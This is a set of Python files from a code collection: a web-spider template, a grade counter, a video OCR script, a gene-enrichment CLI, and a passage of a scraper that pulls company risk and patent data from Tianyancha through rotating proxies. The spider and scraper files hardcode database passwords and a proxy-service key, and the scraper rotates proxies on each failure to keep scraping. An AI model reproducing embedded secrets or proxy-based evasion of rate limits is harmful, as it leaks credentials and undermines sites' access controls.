{"seq_id":"548045123","text":"#-*-coding:utf-8-*-\n# Spider template: fetch pages with requests, parse them with regular expressions,\n# and store the results as TXT, Excel or in a database; supports headers, cookies and proxies.\nimport re\nimport time\nimport os,pymysql,random\nimport xlrd,xlwt\nimport requests\n\nclass Spider(object):\n def __init__(self): # this __init__ is for non-Excel storage\n iplist = ['61.135.217.7:80']\n proxies = random.choice(iplist)\n # proxies = {'http': proxies}\n proxies = {'http': 'http://' + proxies, 'https': 'https://' + proxies, }\n print(proxies)\n self.proxies = proxies\n referer=' '\n cookie=' '\n user_agent = 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4295.400'\n self.headers = {'User-Agent': user_agent, 'Referer': referer, 'Cookie': cookie}\n\n\n '''def __init__(self): # this variant is for Excel storage\n self.m=0\n iplist = ['61.135.217.7:80']\n proxies = random.choice(iplist)\n # proxies = {'http': proxies}\n proxies = {'http': 'http://' + proxies, 'https': 'https://' + proxies, }\n print(proxies)\n self.proxies = proxies\n referer=' '\n cookie=' '\n user_agent = 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4295.400'\n self.headers = {'User-Agent': user_agent, 'Referer': referer, 'Cookie': cookie}\n self.shuju = xlwt.Workbook(encoding='utf-8')\n self.sheet = self.shuju.add_sheet(u'list', cell_overwrite_ok=True)\n sheetcount = (u'No.', u'Address', u'Title', u'Price')\n for i in range(0, len(sheetcount)):\n self.sheet.write(0, i, sheetcount[i], self.set_style('Time new Roman', 220, True))\n self.shuju.save('xlsx.xlsx')'''\n\n 
def set_style(self, name, height, bold=False):\n style = xlwt.XFStyle() # initialize the style\n font = xlwt.Font() # create a font for the style\n font.name = name\n font.bold = bold\n font.colour_index = 2\n font.height = height\n style.font = font\n return style\n def spider(self,url):\n response = requests.get(url, headers=self.headers, proxies=self.proxies).text\n pattern = re.compile(r'(.*?)') # NOTE: the HTML tag literals around the capture groups are missing in this source\n shujus = re.findall(pattern, response)\n for shuju in shujus:\n print(shuju)\n\n def txt(self,url):\n response = requests.get(url, headers=self.headers, proxies=self.proxies).text\n pattern = re.compile(r'(.*?)')\n shujus = re.findall(pattern, response)\n with open('txt.txt', 'a', encoding='utf-8') as f: # append mode, so results already stored are kept whatever happens\n for content in shujus:\n print(content)\n f.write(str(content) + '\\n')\n def excel(self, url):\n response = requests.get(url, headers=self.headers, proxies=self.proxies).text\n pattern = re.compile(r'(.*?)')\n dizhis = re.findall(pattern, response)\n pattern1 = re.compile(r'(.*?)')\n biaotis = re.findall(pattern1, response)\n pattern2 = re.compile(r'(.*?)')\n jiages = re.findall(pattern2, response)\n for i in range(0, len(dizhis)):\n data = [] # create an empty list\n dizhi = dizhis[i]\n biaoti = biaotis[i]\n jiage = jiages[i]\n data.append(self.m + 1)\n data.append(dizhi)\n data.append(biaoti)\n data.append(jiage)\n for j in range(0, len(data)):\n self.sheet.write(self.m + 1, j, data[j])\n self.m = self.m + 1\n print(self.m)\n self.shuju.save('58tongcheng.xlsx')\n def base(self,url):\n db = pymysql.connect(host='localhost', user='root', password='mysqlmm', port=3306, db='douban') # db: name of the target database\n cursor = db.cursor()\n response = requests.get(url, headers=self.headers, proxies=self.proxies).text\n pattern = re.compile(r'(.*?)')\n titles = re.findall(pattern, response)\n pattern1 = re.compile(r'(.*?)')\n scores = re.findall(pattern1, response)\n pattern2 = re.compile(r'(.*?)')\n renshus = re.findall(pattern2, response)\n pattern3 = re.compile(r'(.*?)')\n qitas = re.findall(pattern3, response)\n pattern4 = re.compile(r'(.*?)')\n tupians = re.findall(pattern4, response)\n\n for i in range(0,len(titles)):\n\n title = titles[i]\n score = scores[i]\n renshu = renshus[i]\n qita = qitas[i]\n tupian = tupians[i]\n\n data = {\n 'name': title,\n 'score': score,\n 'good': renshu\n }\n table = 'musics'\n keys = ','.join(data.keys())\n values = ','.join(['%s'] * len(data))\n update = ','.join([\" {key}=%s\".format(key=key) for key in data]) # mind the leading space\n sql = 'INSERT INTO {table}({keys}) VALUES({values}) ON DUPLICATE KEY UPDATE'.format(table=table, keys=keys,\n values=values)\n sql = sql + update\n try:\n if cursor.execute(sql, tuple(data.values()) * 2): # the parameter tuple is required, doubled to fill both halves of the statement\n # if cursor.execute(sql,(title[i],score[i],renshu[i])):\n print('success')\n db.commit() # persist the insert\n except:\n db.rollback()\n print('failed!')\n\n pass\nif __name__=='__main__':\n start=time.time()\n urls = ['https://music.douban.com/top250?start={}'.format(i * 25) for i in range(1, 20)]\n for url in urls:\n f=Spider()\n f.spider(url)\n end=time.time()\n print('Total time spent:',(end-start))","sub_path":"爬虫模板/re.py","file_name":"re.py","file_ext":"py","file_size_in_byte":6252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
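Editor's note on the base() method in the record above: it builds a MySQL upsert from the data dict. With data = {'name': ..., 'score': ..., 'good': ...} and table = 'musics', the generated statement (an illustration derived from the string-building code, not captured program output) is:

    INSERT INTO musics(name,score,good) VALUES(%s,%s,%s) ON DUPLICATE KEY UPDATE name=%s, score=%s, good=%s

which is why it is executed with tuple(data.values()) * 2: the same three values fill the INSERT placeholders and then the UPDATE placeholders.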
{"seq_id":"232316297","text":"x = 1\na = 0\nr = 0\nprint ('The minimum grade is 1.0 and the maximum grade is 5.0. A student needs a grade of 3 or higher to pass')\nfor x in range(1,16):\n y = float(input(f'Enter the grade for student {x}'))\n\n if y >= 3:\n a=a+1\n else:\n r=r+1\n\nprint('Number of students who passed: '+ str(a))\nprint('Number of students who failed: '+ str(r))","sub_path":"Ejercicios/ejercicio 10.py","file_name":"ejercicio 10.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"564840200","text":"import time\nimport pyocr\nfrom PIL import Image\nimport pyocr.builders\nimport cv2\nimport numpy as np\n\n####\n# activate label\n####\n\n#img : PIL image\ndef get_digit_ocr_info(img):\n result = None\n #start_time = time.time()\n #print('******** start convert_image_to_deadline *********')\n\n width, height=img.size\n\n tools = pyocr.get_available_tools()\n tool = tools[0]\n #print(tool)\n langs = tool.get_available_languages()\n #print(\"support langs: %s\" % \", \".join(langs))\n #lang = langs[0]\n lang = 'eng'\n digit_txt = tool.image_to_string(\n img,\n lang=lang,\n builder=pyocr.builders.DigitBuilder(tesseract_layout=6)\n )\n print('DigitBuilder', digit_txt)\n\n #print('******** end convert_image_to_deadline *********')\n return digit_txt\n\n\nvideo = cv2.VideoCapture(\"60fpx.MP4\")\nret, img = video.read()\nimg_win = img.copy()\nrect = (0, 0, img.shape[1], img.shape[0])\nsx = 0\nsy = 0\nabs_x = 0\nabs_y = 0\nabs_sx = 0\nabs_sy = 0\n\ndef callback(event, x, y, flags, param):\n global img, img_win, sx, sy, rect, abs_x, abs_y, abs_sx, abs_sy\n abs_x, abs_y = rect[0] + x, rect[1] + y\n\n if event == cv2.EVENT_LBUTTONDOWN:\n sx, sy = x, y\n abs_sx, abs_sy = abs_x, abs_y\n\n if flags == cv2.EVENT_FLAG_LBUTTON:\n img_win = img.copy()[rect[1]:rect[1] + rect[3], rect[0]:rect[0] + rect[2]]\n cv2.rectangle(img_win, (sx, sy), (x, y), (0, 0, 0), 2)\n\n if event == cv2.EVENT_LBUTTONUP:\n rect_x = np.clip(min(abs_sx, abs_x), 0, img.shape[1] - 2)\n rect_y = np.clip(min(abs_sy, abs_y), 0, img.shape[0] - 2)\n rect_w = np.clip(abs(abs_sx - abs_x), 1, img.shape[1] - rect_x)\n rect_h = np.clip(abs(abs_sy - abs_y), 1, img.shape[0] - rect_y)\n rect = (rect_x, rect_y, rect_w, rect_h)\n img_win = img.copy()[rect[1]:rect[1] + rect[3], rect[0]:rect[0] + rect[2]]\n\n\ncv2.namedWindow(\"img\", cv2.WINDOW_NORMAL)\ncv2.setMouseCallback(\"img\", callback)\nwhile(1):\n cv2.imshow(\"img\", img_win)\n k = cv2.waitKey(1)\n\n if k == ord('f'):\n break\n\n if k == ord(\"r\"):\n rect = (0, 0, img.shape[1], img.shape[0])\n img_win = img.copy()\n\n\nwhile ret:\n ret, img = video.read()\n if not ret: # guard against the final read, which returns img=None\n break\n cv2.imshow(\"video\", img[rect[1]:rect[1] + rect[3], rect[0]:rect[0] + rect[2]])\n gray = Image.fromarray(cv2.cvtColor(img[rect[1]:rect[1] + rect[3], rect[0]:rect[0] + rect[2]], cv2.COLOR_RGB2GRAY))\n num = get_digit_ocr_info(gray)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\nvideo.release()\ncv2.destroyAllWindows()\n\"\"\"\nim = cv2.imread(\"sample.png\")\ngray = Image.fromarray(cv2.cvtColor(im, cv2.COLOR_RGB2GRAY))\nget_digit_ocr_info(gray)\n\"\"\"","sub_path":"ocr/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"408365268","text":"# -*- coding: UTF-8 -*-\n\"\"\"\npython find_enrichment.py study.file population.file gene-association.file\n\nThis program returns P-values for functional enrichment in a cluster of study\ngenes using Fisher's exact test, and corrected for 
multiple testing (including\nBonferroni, Holm, Sidak, and false discovery rate).\n\nAbout significance cutoff:\n--alpha: test-wise alpha; for each GO term, what significance level to apply\n (most often you don't need to change this other than 0.05 or 0.01)\n--pval: experiment-wise alpha; for the entire experiment, what significance\n level to apply after Bonferroni correction\n\"\"\"\n\nfrom __future__ import print_function\n\n__copyright__ = \"Copyright (C) 2010-2018, H Tang et al. All rights reserved.\"\n__author__ = \"various\"\n\nimport os\nimport sys\nimport argparse\nfrom goatools.go_enrichment import GOEnrichmentStudy\nfrom goatools.obo_parser import GODag\nfrom goatools.associations import read_associations\nfrom goatools.multiple_testing import Methods\nfrom goatools.pvalcalc import FisherFactory\n\n\ndef read_geneset(study_fn, pop_fn, compare=False):\n \"\"\"Open files containing genes. Return study genes and population genes.\"\"\"\n pop = set(_.strip() for _ in open(pop_fn) if _.strip())\n study = frozenset(_.strip() for _ in open(study_fn) if _.strip())\n # some times the pop is a second group to compare, rather than the\n # population in that case, we need to make sure the overlapping terms\n # are removed first\n if compare:\n common = pop & study\n pop |= study\n pop -= common\n study -= common\n sys.stderr.write(\"removed %d overlapping items\\n\" % (len(common)))\n sys.stderr.write(\"Set 1: {0}, Set 2: {1}\\n\".format(\n len(study), len(pop)))\n\n return study, pop\n\n\ndef _check_input_files(nspc, parser):\n \"\"\"check filename args. otherwise if one of the 3 filenames is bad\n it's hard to tell which one\"\"\"\n if not len(nspc.filenames) == 3:\n parser.print_help()\n msg = \"\"\"\n 3 Expected files; Expected content: study population association\n {} Actual files: {}\"\"\".format(len(nspc.filenames), ' '.join(nspc.filenames))\n raise Exception(msg)\n for fin in nspc.filenames:\n if not os.path.exists(fin):\n return \"*{}* does not exist\".format(fin)\n\n return False\n\n\ndef get_arg_parser():\n \"\"\"Get enrichment arg parser.\"\"\"\n\n #pylint: disable=invalid-name\n p = argparse.ArgumentParser(__doc__,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n p.add_argument('filenames', type=str, nargs=3,\n help='data/study data/population data/association')\n p.add_argument('--alpha', default=0.05, type=float,\n help=\"Test-wise alpha for multiple testing \")\n p.add_argument('--pval', default=.05, type=float,\n help=\"Only print out when uncorrected p-value < this value.\")\n p.add_argument('--compare', dest='compare', default=False,\n action='store_true',\n help=\"the population file as a comparison group. if this \"\n \"flag is specified, the population is used as the study \"\n \"plus the `population/comparison`\")\n p.add_argument('--ratio', dest='ratio', type=float, default=None,\n help=\"only show values where the difference between study \"\n \"and population ratios is greater than this. useful for \"\n \"excluding GO categories with small differences, but \"\n \"containing large numbers of genes. should be a value \"\n \"between 1 and 2. 
\")\n p.add_argument('--indent', dest='indent', default=False,\n action='store_true', help=\"indent GO terms\")\n p.add_argument('--obo', default=\"go-basic.obo\", type=str,\n help=\"Specifies location and name of the obo file\")\n p.add_argument('--no_propagate_counts', default=False, action='store_true',\n help=\"Do not propagate counts to parent terms\")\n p.add_argument('--outfile', default=None, type=str,\n help=\"Write enrichment results into xlsx or tsv file\")\n p.add_argument('--method', default=\"bonferroni,sidak,holm,fdr_bh\", type=str,\n help=Methods().getmsg_valid_methods())\n p.add_argument('--pvalcalc', default=\"fisher\", type=str,\n help=str(FisherFactory()))\n p.add_argument('--min_overlap', default=0.7, type=float,\n help=\"Check that a minimum amount of study genes are in the population\")\n\n if len(sys.argv) == 1:\n sys.exit(not p.print_help())\n\n args = p.parse_args() # Namespace object from argparse\n _check_input_files(args, p)\n return args\n\ndef rd_files(filenames, compare, prt=sys.stdout):\n \"\"\"Read files and return study and population.\"\"\"\n study_fn, pop_fn, assoc_fn = filenames\n assoc = read_associations(assoc_fn)\n study, pop = read_geneset(study_fn, pop_fn, compare=compare)\n if prt:\n prt.write(\"Study: {0} vs. Population {1}\\n\".format(len(study), len(pop)))\n return study, pop, assoc\n\ndef get_overlap(study, pop):\n \"\"\"Get he ratio of study genes which are in the population.\"\"\"\n return float(len(study & pop)) / len(study)\n\ndef chk_genes(study, pop, min_overlap):\n \"\"\"Check gene sets.\"\"\"\n if len(pop) < len(study):\n exit(\"\\nERROR: The study file contains more elements than the population file. \"\n \"Please check that the study file is a subset of the population file.\\n\")\n # check the fraction of genomic ids that overlap between study\n # and population\n overlap = get_overlap(study, pop)\n if overlap < 0.95:\n sys.stderr.write(\"\\nWARNING: only {} fraction of genes/proteins in study are found in \"\n \"the population background.\\n\\n\".format(overlap))\n if overlap <= min_overlap:\n exit(\"\\nERROR: only {} of genes/proteins in the study are found in the \"\n \"background population. Please check.\\n\".format(overlap))\n\n\ndef get_objgoea(pop, assoc, args):\n \"\"\"Run gene ontology enrichment analysis (GOEA).\"\"\"\n obo_dag = GODag(obo_file=args.obo)\n methods = args.method.split(\",\")\n propagate_counts = not args.no_propagate_counts\n return GOEnrichmentStudy(pop, assoc, obo_dag,\n propagate_counts=propagate_counts,\n alpha=args.alpha,\n pvalcalc=args.pvalcalc,\n methods=methods)\n\ndef prt_results(results, objgoea, args):\n \"\"\"Print GOEA results.\"\"\"\n if args.outfile is None:\n min_ratio = args.ratio\n if min_ratio is not None:\n assert 1 <= min_ratio <= 2\n objgoea.print_summary(results, min_ratio=min_ratio, indent=args.indent, pval=args.pval)\n else:\n # Users can print to both tab-separated file and xlsx file in one run.\n outfiles = args.outfile.split(\",\")\n if args.pval is not None:\n # Only print results when uncorrected p-value < this value.A\n num_orig = len(results)\n results = [r for r in results if r.p_uncorrected <= args.pval]\n print(\"{N:7,} of {M:,} results have uncorrected P-values <= {PVAL}=pval\\n\".format(\n N=len(results), M=num_orig, PVAL=args.pval))\n for outfile in outfiles:\n if outfile.endswith(\".xlsx\"):\n objgoea.wr_xlsx(outfile, results, indent=args.indent)\n else:\n objgoea.wr_tsv(outfile, results, indent=args.indent)\n\n# Copyright (C) 2010-2018, H Tang et al. 
# Copyright (C) 2010-2018, H Tang et al. All rights reserved.\n","sub_path":"goatools/cli/find_enrichment.py","file_name":"find_enrichment.py","file_ext":"py","file_size_in_byte":7641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"545665420","text":"# encoding:utf-8\nimport json\nimport re\n\nimport requests\nimport time\n\nfrom sqlalchemy import Column, String, create_engine, Integer\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.ext.declarative import declarative_base\n\n# Base class for the mapped objects:\nBase = declarative_base()\n\n\nclass sheet1(Base):\n # table name:\n __tablename__ = 'sheet1'\n\n # table structure:\n id = Column(Integer(), primary_key=True, autoincrement=True)\n company_id = Column(String(256))\n company_num = Column(String(256))\n\nclass company_patent(Base):\n # table name:\n __tablename__ = 'company_patent_test'\n\n # table structure:\n id = Column(Integer(), primary_key=True, autoincrement=True)\n company_id = Column(String(256))\n company_num = Column(String(256))\n apply_public_date = Column(String(256))\n patent_name = Column(String(256))\n apply_num = Column(String(256))\n apply_public_num = Column(String(256))\n type = Column(String(256))\n\n gmt_created = Column(String(256))\n gmt_updated = Column(String(256))\nclass company_software(Base):\n # table name:\n __tablename__ = 'company_software_test'\n\n # table structure:\n id = Column(Integer(), primary_key=True, autoincrement=True)\n company_id = Column(String(256))\n company_num = Column(String(256))\n author_nationality = Column(String(256))\n simple_name = Column(String(256))\n reg_num = Column(String(256))\n full_name = Column(String(256))\n cat_num = Column(String(256))\n version = Column(String(256))\n reg_date = Column(String(256))\n publish_date = Column(String(256))\n\n gmt_created = Column(String(256))\n gmt_updated = Column(String(256))\nclass risk_administrative_penalties(Base):\n # table name:\n __tablename__ = 'risk_administrative_penalties'\n\n # table structure:\n id = Column(Integer(), primary_key=True, autoincrement=True)\n company_id = Column(String(256))\n company_num = Column(String(256))\n punish_number = Column(String(256))\n punish_reason = Column(String(256))\n punish_content = Column(String(256))\n punish_date = Column(String(256))\n punish_department = Column(String(256))\n show_type_name = Column(String(256))\n\n gmt_created = Column(String(256))\n gmt_updated = Column(String(256))\n\n\nclass risk_break_rebuild(Base):\n # table name:\n __tablename__ = 'risk_break_rebuild'\n\n # table structure:\n id = Column(Integer(), primary_key=True, autoincrement=True)\n company_id = Column(String(256))\n company_num = Column(String(256))\n submit_time = Column(String(256))\n case_no = Column(String(256))\n case_type = Column(String(256))\n applicant = Column(String(256))\n respondent = Column(String(256))\n court = Column(String(256))\n\n gmt_created = Column(String(256))\n gmt_updated = Column(String(256))\n\n\nclass risk_business_exception(Base):\n # table name:\n __tablename__ = 'risk_business_exception'\n\n # table structure:\n id = Column(Integer(), primary_key=True, autoincrement=True)\n company_id = Column(String(256))\n company_num = Column(String(256))\n put_date = Column(String(256))\n put_department = Column(String(256))\n put_reason = Column(String(256))\n put_reason_type = Column(String(256))\n\n gmt_created = Column(String(256))\n gmt_updated = Column(String(256))\n\n\n
class risk_dishonest(Base):\n # table name:\n __tablename__ = 'risk_dishonest'\n\n # table structure:\n id = Column(Integer(), primary_key=True, autoincrement=True)\n company_id = Column(String(256))\n company_num = Column(String(256))\n reg_date = Column(String(256))\n publish_date = Column(String(256))\n gist_unit = Column(String(256))\n case_code = Column(String(256))\n gis_tid = Column(String(256))\n disrupt_type_name = Column(String(256))\n performance = Column(String(256))\n i_name = Column(String(256))\n\n gmt_created = Column(String(256))\n gmt_updated = Column(String(256))\n\n\nclass risk_environmental_money(Base):\n # table name:\n __tablename__ = 'risk_environmental_money'\n\n # table structure:\n id = Column(Integer(), primary_key=True, autoincrement=True)\n company_id = Column(String(256))\n company_num = Column(String(256))\n publish_time = Column(String(256))\n punish_number = Column(String(256))\n punish_reason = Column(String(256))\n punish_content = Column(String(256))\n punish_department = Column(String(256))\n\n gmt_created = Column(String(256))\n gmt_updated = Column(String(256))\n\n\nclass risk_home_mortgage(Base):\n # table name:\n __tablename__ = 'risk_home_mortgage'\n\n # table structure:\n id = Column(Integer(), primary_key=True, autoincrement=True)\n company_id = Column(String(256))\n company_num = Column(String(256))\n reg_date = Column(String(256))\n reg_num = Column(String(256))\n people_info = Column(String(256))\n mort_gagor_info = Column(String(256))\n over_view_type = Column(String(256))\n over_view_term = Column(String(256))\n amount = Column(String(256))\n reg_department = Column(String(256))\n\n gmt_created = Column(String(256))\n gmt_updated = Column(String(256))\n\n\nclass risk_limit_consumer(Base):\n # table name:\n __tablename__ = 'risk_limit_consumer'\n\n # table structure:\n id = Column(Integer(), primary_key=True, autoincrement=True)\n company_id = Column(String(256))\n company_num = Column(String(256))\n publish_date = Column(String(256))\n case_code = Column(String(256))\n qy_info = Column(String(256))\n x_name = Column(String(256))\n applicant = Column(String(256))\n case_create_time = Column(String(256))\n\n gmt_created = Column(String(256))\n gmt_updated = Column(String(256))\n\n\nclass risk_owe_tax_notice(Base):\n # table name:\n __tablename__ = 'risk_owe_tax_notice'\n\n # table structure:\n id = Column(Integer(), primary_key=True, autoincrement=True)\n company_id = Column(String(256))\n company_num = Column(String(256))\n legalperson_name = Column(String(256))\n location = Column(String(256))\n name = Column(String(256))\n new_own_tax_balance = Column(String(256))\n own_tax_balance = Column(String(256))\n publish_date = Column(String(256))\n tax_category = Column(String(256))\n taxId_number = Column(String(256))\n\n gmt_created = Column(String(256))\n gmt_updated = Column(String(256))\n\n\nclass risk_serious_violation(Base):\n # table name:\n __tablename__ = 'risk_serious_violation'\n\n # table structure:\n id = Column(Integer(), primary_key=True, autoincrement=True)\n company_id = Column(String(256))\n company_num = Column(String(256))\n put_reason = Column(String(256))\n put_department = Column(String(256))\n put_date = Column(String(256))\n\n gmt_created = Column(String(256))\n gmt_updated = Column(String(256))\n\n\nclass risk_tax_money(Base):\n # table name:\n __tablename__ = 'risk_tax_money'\n\n # table structure:\n id = Column(Integer(), primary_key=True, autoincrement=True)\n company_id = Column(String(256))\n company_num = Column(String(256))\n case_type = Column(String(256))\n department = Column(String(256))\n taxpayer_name = Column(String(256))\n\n gmt_created = Column(String(256))\n gmt_updated = Column(String(256))\n\n\nclass risk_limit_out_city(Base):\n # table name:\n __tablename__ = 'risk_limit_out_city'\n\n # table structure:\n id = Column(Integer(), primary_key=True, autoincrement=True)\n company_id = Column(String(256))\n company_num = Column(String(256))\n issue_date = Column(String(256))\n human_name = Column(String(256))\n executed = Column(String(256))\n executed_address = Column(String(256))\n applicant = Column(String(256))\n money = Column(String(256))\n court = Column(String(256))\n\n gmt_created = Column(String(256))\n gmt_updated = Column(String(256))\n\n\n
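# Editor's note (assumption): the script expects the tables above to exist\n# already; if they do not, standard SQLAlchemy can create them from these\n# models once the engine below has been constructed:\n#\n# Base.metadata.create_all(engine)\n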
# Initialize the database connection:\nengine = create_engine('mysql+mysqlconnector://root:BOOT-xwork1024@192.168.2.97:3306/spider')\n# Create the DBSession class:\nDBSession = sessionmaker(bind=engine)\n# Create a session object:\nsession = DBSession()\n\n\ndef dl(proxys):\n time.sleep(0.4)\n try:\n dlurl = 'http://api.ip.data5u.com/dynamic/get.html?order=fba1729fce7d27397dc2db1dc5db9977&random=2&sep=3'\n resp = requests.get(dlurl).text\n resp = re.sub(r'\\n', '', resp)\n proxy = {\n 'https': resp\n }\n proxys[0] = proxy\n print(proxys)\n except Exception as e:\n dl(proxys)\n\n\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36\"\n}\n\n\n# Software copyrights 3\ndef soft(company_id, company_num):\n f = False\n max_pages = 100\n # for page in range(1, max_pages + 1):\n # if f:\n # break\n time.sleep(0.4)\n while 1:\n try:\n # data = {\"_\": \"1662602428454\", \"id\": \"4997169666\", \"pageSize\": 100, \"pageNum\": page, \"regYear\": \"-100\", }\n data = {\"_\": \"1662602428454\", \"id\": company_num, \"pageSize\": 100, \"pageNum\": 1, \"regYear\": \"-100\", }\n\n d = requests.get(\n \"https://capi.tianyancha.com/cloud-intellectual-property/intellectualProperty/softwareCopyrightListV2?\",\n headers=headers, params=data, proxies=proxys[-1], timeout=8).json()\n print(\"----- soft -----\")\n\n if d[\"data\"] == None:\n break\n try:\n items = d[\"data\"]['items']\n except Exception:\n break\n for item in items:\n try:\n simple_name = item['simplename']\n author_nationality = item['authorNationality']\n reg_num = item['regnum']\n full_name = item['fullname']\n cat_num = item['catnum']\n version = item['version']\n reg_date = parse_time(item['regtime'])\n publish_date = parse_time(item['publishtime'])\n times = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n\n Soft = company_software(company_id=company_id, company_num=company_num, simple_name=simple_name,\n author_nationality=author_nationality,\n reg_num=reg_num, full_name=full_name, cat_num=cat_num, version=version,\n reg_date=reg_date, publish_date=publish_date,\n gmt_created=times, gmt_updated=times)\n except Exception:\n continue\n else:\n session.add(Soft)\n finally:\n session.commit()\n print(\"--soft-- over\")\n break\n\n except Exception as e:\n print(e)\n time.sleep(0.4)\n dl(proxys)\n\n\n
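# The fetchers below all repeat the shape of soft() above: request one page of\n# the Tianyancha API through the current proxy, map the JSON items onto the\n# ORM models, commit, and on any error rotate the proxy via dl() and retry.\n# parse_time() (defined near the bottom) converts the API's millisecond\n# epochs, e.g. parse_time(1662602428454) -> '2022-09-08' (local time).\n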
# Patents 3\ndef patent(company_id, company_num):\n time.sleep(0.4)\n while 1:\n try:\n data = {\"_\": \"1662602428454\", \"id\": company_num, \"pageSize\": 100, \"pageNum\": 1, \"type\": \"-100\",\n \"lprs\": \"-100\", \"applyYear\": \"-100\", \"pubYear\": \"-100\", \"sortType\": \"-100\"}\n d = requests.get(\"https://capi.tianyancha.com/cloud-intellectual-property/patent/patentListV6?\",\n headers=headers, params=data, proxies=proxys[-1], timeout=8).json()\n\n print(\"----- patent -----\")\n time.sleep(0.4)\n\n try:\n items = d[\"data\"]['items']\n except Exception:\n break\n # realTotal = d[\"data\"]['realTotal']\n\n if items == None or items == []:\n # print(\"patent is out\")\n # f = True\n break\n for item in items:\n try:\n apply_public_date = item['applicationPublishTime']\n patent_name = item['title']\n apply_num = item['pubnumber']\n # apply_public_num = item['patentNum']\n type = item['patentType']\n times = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n\n Patent = company_patent(company_id=company_id, company_num=company_num,\n apply_public_date=apply_public_date, patent_name=patent_name,\n apply_num=apply_num, type=type,\n gmt_created=times, gmt_updated=times)\n except Exception:\n continue\n else:\n session.add(Patent)\n finally:\n session.commit()\n print(\"--patent-- over\")\n break\n except Exception as e:\n print(e)\n time.sleep(0.4)\n dl(proxys)\n\n\n# Administrative penalties 3\ndef Administrative_penalties(company_id, company_num):\n # max_pages = 100\n # for page in range(1, max_pages + 1):\n # time.sleep(0.4)\n #\n while 1:\n try:\n data = {\"withOwner\": 0, \"_\": \"1663054546144\", \"pageSize\": 100, \"pageNum\": 1, \"gid\": company_num}\n d = requests.get(\n \"https://capi.tianyancha.com/cloud-operating-risk/operating/punishment/punishIndexList?\",\n headers=headers, params=data, proxies=proxys[-1], timeout=8).json()\n\n print(\"----- Administrative_penalties -----\")\n\n time.sleep(0.4)\n try:\n items = d[\"data\"]['list']\n except Exception:\n break\n if items == None or items == []:\n break\n for item in items:\n try:\n punishContent = item['punishContent']\n punishDate = item['punishDate']\n punishDepartment = item['punishDepartment']\n punishNumber = item['punishNumber']\n punishReason = item['punishReason']\n showTypeName = item['showTypeName']\n times = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n\n Patent = risk_administrative_penalties(company_id=company_id, company_num=company_num,\n punish_content=punishContent, punish_date=punishDate,\n punish_department=punishDepartment,\n punish_number=punishNumber, punish_reason=punishReason,\n show_type_name=showTypeName,\n gmt_created=times, gmt_updated=times)\n except Exception:\n continue\n else:\n session.add(Patent)\n finally:\n session.commit()\n\n print(\"--Administrative_penalties-- over\")\n break\n except Exception as e:\n print(e)\n time.sleep(0.4)\n dl(proxys)\n\n\n# Business anomalies 3\ndef business_exception(company_id, company_num):\n while 1:\n try:\n data = {\"_\": \"1663054546144\", \"pageSize\": 100, \"pageNum\": 1, \"gid\": company_num,\n \"abnormalType\": 1}\n d = requests.get(\n \"https://capi.tianyancha.com/cloud-operating-risk/operating/abnormal/getAbnormalListByType?\",\n headers=headers, params=data, proxies=proxys[-1], timeout=8).json()\n print(\"----- business_exception -----\")\n time.sleep(0.4)\n try:\n items = d[\"data\"]['result']\n except Exception:\n break\n if items == None or items == []:\n break\n for item in items:\n try:\n putDate = item['putDate']\n putDepartment = item['putDepartment']\n putReason = item['putReason']\n putReasonType = item['putReasonType']\n times = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n\n Patent = risk_business_exception(company_id=company_id, company_num=company_num,\n put_date=putDate, put_department=putDepartment,\n put_reason=putReason, put_reason_type=putReasonType,\n gmt_created=times, gmt_updated=times)\n except Exception:\n continue\n else:\n session.add(Patent)\n finally:\n session.commit()\n print(\"--business_exception-- over\")\n break\n except Exception as e:\n print(e)\n time.sleep(0.4)\n dl(proxys)\n\n\n# Serious violations 3\ndef Serious_violation(company_id, company_num):\n while 1:\n try:\n data = {\"_\": \"1663054546144\", \"pageSize\": 100, \"illegalType=1\": 1, \"pageNum\": 1, \"gid\": company_num}\n d = requests.get(\n 
\"https://capi.tianyancha.com/cloud-operating-risk/operating/illegal/getCompanyIllegalInfoListByType?\",\n headers=headers, params=data, proxies=proxys[-1], timeout=8).json()\n print(\"----- Serious_violation -----\")\n\n time.sleep(0.4)\n try:\n items = d[\"data\"]['items']\n except Exception:\n break\n if items == None or items == []:\n break\n for item in items:\n try:\n putReason = item['putReason']\n putDepartment = item['putDepartment']\n putDate = item['putDate']\n times = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n\n Patent = risk_serious_violation(company_id=company_id, company_num=company_num,\n put_date=putDate, put_department=putDepartment,\n put_reason=putReason,\n gmt_created=times, gmt_updated=times)\n except Exception:\n continue\n else:\n session.add(Patent)\n finally:\n session.commit()\n print(\"--Serious_violation-- over\")\n break\n except Exception as e:\n print(e)\n time.sleep(0.4)\n dl(proxys)\n\n\n# 税收违法3\ndef tax_money(company_id, company_num):\n while 1:\n try:\n data = {\"_\": \"1663054546144\", \"pageSize\": 100, \"pageNum\": 1, \"gid\": company_num}\n d = requests.get(\n \"https://capi.tianyancha.com/cloud-operating-risk/operating/taxContraventions/getTaxContraventions?\",\n headers=headers, params=data, proxies=proxys[-1], timeout=8).json()\n print(\"----- tax_money -----\")\n\n time.sleep(0.4)\n try:\n items = d[\"data\"]['result']\n except Exception:\n break\n if items == None or items == []:\n break\n for item in items:\n 